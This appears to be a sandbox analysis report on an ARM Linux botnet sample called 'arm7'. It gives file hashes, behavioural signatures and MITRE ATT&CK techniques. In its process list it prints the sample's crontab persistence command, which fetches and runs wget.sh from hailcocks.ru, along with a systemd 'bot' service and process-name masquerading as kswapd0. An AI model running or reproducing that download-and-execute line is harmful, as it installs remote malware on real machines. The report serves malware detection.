Analysis
-
max time kernel
137s -
max time network
148s -
platform
debian-12_armhf -
resource
debian12-armhf-20240221-en -
resource tags
arch:armhfimage:debian12-armhf-20240221-enkernel:6.1.0-17-armmp-lpaelocale:en-usos:debian-12-armhfsystem -
submitted
27-10-2024 11:20
Static task
static1
Behavioral task
behavioral1
Sample
arm7
Resource
debian12-armhf-20240221-en
General
-
Target
arm7
-
Size
102KB
-
MD5
f89985f03f8a27ab418e05bc232e4387
-
SHA1
b57e7df8cf4013be718f56be205e14919101e87a
-
SHA256
15af70f91b8099d491f6d891cd063301b8e40e063aa0554294ec28cab71753c6
-
SHA512
d4a66a8054dbd4cfbe2865c64bfde1e3dff384b1504a04b8ee21384737960de425e1069a2de14b6972420c99fbc40f0d11a7568d059678837b01c5868cd336b9
-
SSDEEP
3072:lK8+viZckDqI5GaHSfCr8ZwTEEs2S8SjjIxX:lK8bZckDlGaHSfCr8iTEWSJjkxX
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 1 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Renames itself 1 IoCs
Processes:
arm7pid process 710 arm7 -
Unexpected DNS network traffic destination 1 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
Processes:
description ioc Destination IP 81.169.136.222 -
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
Processes:
crontabdescription ioc process File opened for modification /var/spool/cron/crontabs/tmp.N6iEci crontab -
Modifies systemd 2 TTPs 1 IoCs
Adds/ modifies systemd service files. Likely to achieve persistence.
Processes:
arm7description ioc process File opened for modification /lib/systemd/system/bot.service arm7 -
Changes its process name 1 IoCs
Processes:
arm7description ioc pid process Changes the process name, possibly in an attempt to hide itself [kswapd0] 710 arm7 -
Command and Scripting Interpreter: Unix Shell 1 TTPs 1 IoCs
Execute scripts via Unix Shell.
-
Processes:
arm7systemctldescription ioc process File opened for reading /proc/mounts arm7 File opened for reading /proc/filesystems systemctl
Processes
-
/tmp/arm7/tmp/arm7 massload1⤵
- Renames itself
- Modifies systemd
- Changes its process name
- Reads runtime system information
PID:710 -
/bin/sh/bin/sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"2⤵
- File and Directory Permissions Modification
PID:713 -
/usr/bin/crontabcrontab -3⤵
- Creates/modifies Cron job
PID:717 -
/usr/bin/crontabcrontab -l3⤵PID:718
-
/bin/sh/bin/sh -c "/bin/systemctl enable bot"2⤵
- Command and Scripting Interpreter: Unix Shell
PID:725 -
/bin/systemctl/bin/systemctl enable bot3⤵
- Reads runtime system information
PID:727
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1Unix Shell
1Scheduled Task/Job
1Cron
1Persistence
Boot or Logon Autostart Execution
1XDG Autostart Entries
1Create or Modify System Process
1Systemd Service
1Scheduled Task/Job
1Cron
1Privilege Escalation
Boot or Logon Autostart Execution
1XDG Autostart Entries
1Create or Modify System Process
1Systemd Service
1Scheduled Task/Job
1Cron
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
302B
MD5a4e30f6ce6fb6cf00e133f3c93fb5449
SHA167b7de93a672ada4abfe11e339dc2e270c61b69d
SHA256a911f4bb5c69ad831fd6dc9004e52e656a846b2d7cbf152ab80c9b3928062ede
SHA512893cda7cdcb75aceef89c64a38004feff8e5867e7bc76c622a49adfbff3fbb2c7916de6165ed4c43b4c7dabb5b56271e5a1b8a08d02b84389da92ec177289c25
-
Filesize
306B
MD5d1e5ec52400d9ce3cd0440d3ae19100b
SHA1445ec9cf7993dc113446742c7a2ef1f0e07586f6
SHA256af1ba6bde9ac046bf76b4223834ae65344fced4bf87070dadd61ce0595c52248
SHA512e70d30efe7c2df35eaba1fcf759c0c38a5c27b55ece9d2e51cd4b260cc3f3977726a1f8610cac9a951a9fbebc570ad5640147a3282aa406d23ffa840bd5a2682